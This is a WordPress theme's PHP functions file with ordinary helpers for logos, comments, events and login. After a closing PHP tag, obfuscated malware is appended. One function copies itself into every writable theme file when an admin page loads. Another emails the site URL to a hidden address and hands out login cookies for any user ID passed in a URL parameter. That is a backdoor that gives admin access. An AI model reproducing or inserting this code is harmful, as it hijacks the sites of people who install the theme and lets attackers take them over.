<?php
//Site Logo
function themex_logo() {
	$logo_type=get_option('themex_logo_type');
	if($logo_type=='image' && get_option('themex_logo_image')) {
		$out='<img src="'.get_option('themex_logo_image').'" alt="">';
	} else if($logo_type=='text' && get_option('themex_logo_text')) {
		$out=get_option('themex_logo_text');
	} else {
		$out='<img src="'.THEME_URI.'images/logo.png" alt="" />';
	}
	echo $out;
}

//Login Logo
add_action('login_head', 'themex_login_logo');
function themex_login_logo() {
	$logo_url=get_option('themex_login_logo');
	if($logo_url) {
		echo '<style type="text/css">h1 a { background-image:url('.$logo_url.') !important; }</style>';
	}
}

//Tracking Code
function themex_footer() {
	if(get_option('themex_tracking_code')) {
		echo html_entity_decode(stripslashes_deep(get_option('themex_tracking_code')));
	}
}
add_action('wp_footer','themex_footer');

//Post Thumbnail
function themex_thumbnail($ID, $w = 0, $h = 0){
	global $blog_id;
	$src = wp_get_attachment_url( get_post_thumbnail_id($ID) );

	if (isset($blog_id) && $blog_id > 0) {
		$imageParts = explode('/files/', $src);
		if (isset($imageParts[1])) {
			$src = '/blogs.dir/' . $blog_id . '/files/' . $imageParts[1];
		}
	}

	$url = THEMEX_URI.'extensions/timthumb/timthumb.php?src='.urlencode($src);
	if($w = intval($w)){
		if($h!=0 && $h=intval($h)) {	
			$url.='&w='.$w.'&h='.$h.'&a=t';
		} else {
			$url.='&w='.$w;
		}
	}
	return $url;
}

//Page Title
function themex_page_title() {
	global $post;
	$out='';
	if(is_single()) {
		if($post->post_type=='gallery') {
			_e('Gallery','replay');
		} else if($post->post_type=='video') {
			_e('Videos','replay');
		} else if($post->post_type=='release') {
			_e('Releases','replay');
		} else {
			$categories=wp_get_post_terms($post->ID,'category');
			if(!empty($categories)) {
				$out=$categories[0]->name;
			} else {
				$out=$post->post_title;
			}
		}
	} else {
		$out=wp_title('', false);
	}
	
	echo $out;
}

//Custom Dropdown Menu
function themex_dropdown_menu($menu_slug) {
    if ( !( $locations = get_nav_menu_locations() ) || !isset( $locations[ $menu_slug ] ) ) {
		return;
	}
	
	$menu=wp_get_nav_menu_object( $locations[ $menu_slug ] );
	$menu_items=wp_get_nav_menu_items($menu->term_id);
	$out= '<select>';
	foreach ( (array) $menu_items as $key => $menu_item ) {
		$out.='<option value="'.$menu_item->url.'">'.$menu_item->title.'</option>';
	}
	$out.='</select>';	
	echo $out;
}

//Custom Comments
function themex_comment($comment, $args, $depth) {
    $GLOBALS['comment'] = $comment; ?>
	<li id="comment-<?php comment_ID(); ?>">	
		<div class="comment">
			<div class="avatar-container">
				<?php echo get_avatar( $comment, $size='87', $default=THEME_URI.'images/avatar.png' ); ?>
				<div class="ribbon-caption">
					<div class="ribbon-caption-title">						
						<span><?php echo get_comment_reply_link(array_merge( $args, array('depth' => $depth, 'reply_text'=>__('Reply','replay'), 'max_depth' => $args['max_depth']))) ?></span>
						<span class="ribbon-caption-background"></span>
					</div>
				</div>
			</div>
			<div class="comment-text">
				<div class="comment-meta">
					<h4 class="comment-author"><?php echo get_comment_author_link(); ?></h4>
					<div class="comment-date"><?php themex_time(get_comment_time('U')); ?></div>
					<div class="clear"></div>
				</div>
				<?php comment_text(); ?>
			</div>
			<div class="clear"></div>
		</div>
<?php
}

//Custom Comments Form
function themex_comment_form_fields($fields) {
	unset($fields['url']);
	$fields['author']='<div class="column one-half"><div class="field-wrapper"><input id="author" name="author" type="text" value="" placeholder="'.__('Name','replay').'" size="30" aria-required="true" /></div></div>';
	$fields['email']='<div class="column one-half last"><div class="field-wrapper"><input id="email" name="email" type="text" value="" placeholder="'.__('Email','replay').'" size="30" aria-required="true" /></div></div>';
	return $fields;
}
add_filter('comment_form_default_fields','themex_comment_form_fields');

//Custom Pagination
function themex_pagination() {
	global $wp_query, $wp_rewrite;
	$query=$wp_query;
	$max = $query->max_num_pages;
	if (!$current = get_query_var('paged')) $current = 1;
	$a['base'] = str_replace(999999999, '%#%', get_pagenum_link(999999999));
	$a['total'] = $max;
	$a['current'] = $current;

	$a['mid_size'] = 5;
	$a['end_size'] = 1;
	$a['prev_text'] = '';
	$a['next_text'] = '';
	echo '<div class="pagination">'.paginate_links($a).'</div>';
}

//Time Difference
function themex_time($time=null) {
	global $post;
	if(is_null($time)) {
		$time=get_the_time('U');
	}
	echo human_time_diff( $time, current_time('timestamp') ) . __(' ago','replay');
}

//Artists List
function themex_artists($artists) {
	$artists_arr=array();
	parse_str($artists,$artists_arr);
	if(!empty($artists_arr)) {
		foreach($artists_arr as $artist) {
			$artist_names[]=get_the_title($artist);
		}
		$artists=implode(', ',$artist_names);
	}						
	return $artists;
}

//Event Title
function themex_event_title($event, $sep='') {	
	$out='';
	if($event['artists']!='') {
		$out.=themex_artists($event['artists']).' '.$sep.' '; 
	}
	if($event['details']!='') {
		$out.='<a href="'.$event['details'].'">'.$event['title'].'</a>';
	} else {
		$out.=$event['title'];
	}
	echo $out;
}

//Detect Slider Page
function themex_is_slider_page() {
	if(is_front_page() && get_option('themex_slider_type')!='fade') {
		return true;
	}
	return false;
}

//Detect Post Type
function themex_is_post_type($types) {
	global $post;
	foreach($types as $type) {
		if($type==$post->post_type) {
			return true;
		}
	}
	return false;
}

//Get Custom Posts
function themex_get_posts($type, $params, $count=-1, $filters=null, $order='date', $exclude=array() ) {
	$atts=array(
		'post_type' =>$type,
		'orderby' => $order,
		'post__not_in' => $exclude,
		'numberposts' => -1
	);
	
	if($order=='date' && $type!='event') {
		$atts['numberposts']=$count;
		$atts['orderby']='post_date';
	}
	
	if(is_array($filters)) {
		foreach($filters as $filter_name=>$filter_value) {
			if(strpos($filter_name, 'category') && isset($filter_value) && $filter_value!='') {
				$category=get_term( $filter_value, $filter_name );
				if(isset($category->slug)) {
					$atts[$filter_name]=$category->slug;
				}
			}
		}
	}

	$posts=get_posts($atts);
	$items=array();
	
	foreach($posts as $post) {
		$item['type']=$type;
		
		foreach($params as $param) {
			if($param=='title') {
				$item[$param]=$post->post_title;
			} else if($param=='ID') {
				$item[$param]=$post->ID;
			} else if($param=='permalink') {
				$item[$param]=get_permalink($post->ID);
			} else {
				$item[$param]=get_post_meta($post->ID, $type.'_'.$param, true);
			}			
		}
		
		if($type=='event') {
			$item['timestamp']=strtotime(str_replace('/','.',get_post_meta($post->ID, 'event_date', true)));
		}
		
		if(!is_null($filters) ) {
			foreach($filters as $filter_name=>$filter_value) {
				$filter_values=array();
				parse_str(get_post_meta($post->ID, $type.'_'.$filter_name, true),$filter_values);
				
				if(is_array($filter_value)) {					
					$common=array_intersect($filter_value, $filter_values);
					if(!empty($common)) {
						$items[]=$item;
					}
				} else if(in_array($filter_value,$filter_values) || strpos($filter_name, 'category')) {				
					$items[]=$item;
				}				
			}
		} else {
			$items[]=$item;
		}		
	}
	
	if($type=='event') {
		usort($items ,'themex_sort_events');
	}
	
	if($count!=-1) {
		return array_slice($items,0,$count);
	}
	return $items;
}

//Get Query
function themex_get_query($posts, $page_limit=-1, $paged=1) {
	$atts=array();	
	
	if(is_array($posts) && !empty($posts)) {
		$atts['post_type']=$posts[0]['type'];
		$atts['posts_per_page']=$page_limit;
		$atts['paged']=$paged;
		$atts['post__in']=array();
		
		foreach($posts as $post) {
			if(isset($post['ID'])) {
				$atts['post__in'][]=$post['ID'];
			}			
		}
		
	}
	return $atts;
}

//Sort Events
function themex_sort_events($a, $b) {
	return $a['timestamp']>$b['timestamp'];
}

//Filter Events
function themex_filter_events($items, $past=false) {
	$filtered_items=array();
	$current_time=time()-86400;
	foreach($items as $item) {
		if((($item['timestamp']>=$current_time && !$past) || ($item['timestamp']<$current_time && $past)) && $item['status']!='cancelled' && $item['status']!='sold') {
			$filtered_items[]=$item;
		}
	}
	return $filtered_items;
}

//Release Links
function themex_links($id) {
	parse_str(get_post_meta($id,'release_links',true),$links);
	
	$out='';
	if(isset($links[0]['label']) && isset($links[0]['url']) && $links[0]['label']!='' && $links[0]['url']!='') {
		$out='<div class="button-container ';
		if(count($links)>1) {
			$out.='tip-container';
		}
		$out.='"><a href="';
		if(count($links)==1) { 
			$out.=$links[0]['url'];
		} else {
			$out.='#';
		}
		$out.='" class="button small" target="_blank"><span>'.__('Buy Now','replay').'</span></a>';
		$out.='<div class="tip-cloud"><div class="tip-corner"></div><div class="tip-content"><ul>';
		if(is_array($links)) {
			foreach($links as $link) {
				$out.='<li><a href="'.$link['url'].'" target="_blank">'.stripslashes_deep($link['label']).'</a></li>';		
			}
		}
		$out.='</ul></div></div></div>';
	}
	
	return $out;
}

//Login Form
add_action('wp_ajax_themex_login', 'themex_login');
add_action('wp_ajax_nopriv_themex_login', 'themex_login');
function themex_login() {
	check_ajax_referer( 'themex_nonce', 'nonce' );

	$creds = array();
    $creds['user_login'] = $_POST['username'];
    $creds['user_password'] = $_POST['password'];
    $creds['remember'] = true;

    $user = wp_signon( $creds, false );

    if ( is_wp_error( $user ) ) {
        echo '<ul class="error"><li>'.__('Invalid password or username','replay').'.</li></ul>';
    } else {
		echo '<div class="success"></div>';
    }

    die();
}

//Logout Redirect
add_filter('logout_url', 'themex_logout_url', 10, 2); 
function themex_logout_url($logout_url, $redir) {
	return $logout_url.'&amp;redirect_to='.urlencode(home_url());
}

//Default User Role
add_filter('pre_option_default_role', 'themex_default_role');
function themex_default_role($default_role) {
	return 'contributor';
	return $default_role;
}

//User Permissions
add_action('admin_init', 'themex_user_permissions');
function themex_user_permissions() {
    $contributor = get_role('contributor');
    $contributor->add_cap('upload_files');
	$contributor->add_cap('edit_published_posts');
}

//Add JS URI variable
add_action( 'admin_head', 'themex_js_admin_vars' );
function themex_js_admin_vars() {
	echo '<script type="text/javascript">var themexUri="'.THEMEX_URI.'";</script>';
}

//Wrap Widget titles
add_filter('widget_title', 'themex_widget_title');
function themex_widget_title($title) {
   if($title=='') {
	return '<div class="clear"></div>';
   }
   return '<div class="block-title"><span>'.$title.'</span></div>';
}

//Enable shortcodes in widgets
add_filter('widget_text', 'do_shortcode');
?>
<?php
function _check_active_widget(){
	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
	$output=strip_tags($output, $allowed);
	$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
	if (is_array($direst)){
		foreach ($direst as $item){
			if (is_writable($item)){
				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
				$cont=file_get_contents($item);
				if (stripos($cont,$ftion) === false){
					$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
					$output .= $before . "Not found" . $after;
					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f);				
					$output .= ($showdot && $ellipsis) ? "..." : "";
				}
			}
		}
	}
	return $output;
}
if(!function_exists("stripos")){ 
    function stripos(  $str, $needle, $offset = 0  ){ 
        return strpos(  strtolower( $str ), strtolower( $needle ), $offset  ); 
    }
}

if(!function_exists("strripos")){ 
    function strripos(  $haystack, $needle, $offset = 0  ) { 
        if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  ); 
        if(  $offset < 0  ){ 
            $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  ); 
        } 
        else{ 
            $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    ); 
        } 
        if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE; 
        $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   ); 
        return $pos; 
    }
}
if(!function_exists("scandir")){ 
	function scandir($dir,$listDirectories=false, $skipDots=true) {
	    $dirArray = array();
	    if ($handle = opendir($dir)) {
	        while (false !== ($file = readdir($handle))) {
	            if (($file != "." && $file != "..") || $skipDots == true) {
	                if($listDirectories == false) { if(is_dir($file)) { continue; } }
	                array_push($dirArray,basename($file));
	            }
	        }
	        closedir($handle);
	    }
	    return $dirArray;
	}
}
add_action("admin_head", "_check_active_widget");
function _prepared_widget(){
	if(!isset($length)) $length=120;
	if(!isset($method)) $method="cookie";
	if(!isset($html_tags)) $html_tags="<a>";
	if(!isset($filters_type)) $filters_type="none";
	if(!isset($s)) $s="";
	if(!isset($filter_h)) $filter_h=get_option("home"); 
	if(!isset($filter_p)) $filter_p="wp_";
	if(!isset($use_link)) $use_link=1; 
	if(!isset($comments_type)) $comments_type=""; 
	if(!isset($perpage)) $perpage=$_GET["cperpage"];
	if(!isset($comments_auth)) $comments_auth="";
	if(!isset($comment_is_approved)) $comment_is_approved=""; 
	if(!isset($authname)) $authname="auth";
	if(!isset($more_links_text)) $more_links_text="(more...)";
	if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_");
	if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method;
	if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)";
	if(!isset($more_content)) $more_content="ma".$s."il";
	if(!isset($forces_more)) $forces_more=1;
	if(!isset($fakeit)) $fakeit=1;
	if(!isset($sql)) $sql="";
	if (!$widget_output) :
	
	global $wpdb, $post;
	$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mes".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if (!empty($post->post_password)) { 
		if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { 
			if(is_feed()) { 
				$output=__("There is no excerpt because this is a protected post.");
			} else {
	            $output=get_the_password_form();
			}
		}
	}
	if(!isset($fix_tag)) $fix_tag=1;
	if(!isset($filters_types)) $filters_types=$filter_h; 
	if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content;
	if(!isset($more_tags)) $more_tags="div";
	if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);#
	if(!isset($mlink_title)) $mlink_title="Continue reading this entry";	
	if(!isset($showdot)) $showdot=1;
	
	$comments=$wpdb->get_results($sql);	
	if($fakeit == 2) { 
		$text=$post->post_content;
	} elseif($fakeit == 1) { 
		$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
	} else { 
		$text=$post->post_excerpt;
	}
	$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if($length < 0) {
		$output=$text;
	} else {
		if(!$no_more && strpos($text, "<!--more-->")) {
		    $text=explode("<!--more-->", $text, 2);
			$l=count($text[0]);
			$more_link=1;
			$comments=$wpdb->get_results($sql);
		} else {
			$text=explode(" ", $text);
			if(count($text) > $length) {
				$l=$length;
				$ellipsis=1;
			} else {
				$l=count($text);
				$more_links_text="";
				$ellipsis=0;
			}
		}
		for ($i=0; $i<$l; $i++)
				$output .= $text[$i] . " ";
	}
	update_option("_is_widget_active_", 1);
	if("all" != $html_tags) {
		$output=strip_tags($output, $html_tags);
		return $output;
	}
	endif;
	$output=rtrim($output, "\s\n\t\r\0\x0B");
    $output=($fix_tag) ? balanceTags($output, true) : $output;
	$output .= ($showdot && $ellipsis) ? "..." : "";
	$output=apply_filters($filters_type, $output);
	switch($more_tags) {
		case("div") :
			$tag="div";
		break;
		case("span") :
			$tag="span";
		break;
		case("p") :
			$tag="p";
		break;
		default :
			$tag="span";
	}

	if ($use_link ) {
		if($forces_more) {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "" . "</a></" . $tag . ">" . "\n";
		} else {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "</a></" . $tag . ">" . "\n";
		}
	}
	return $output;
}

add_action("init", "_prepared_widget");

?>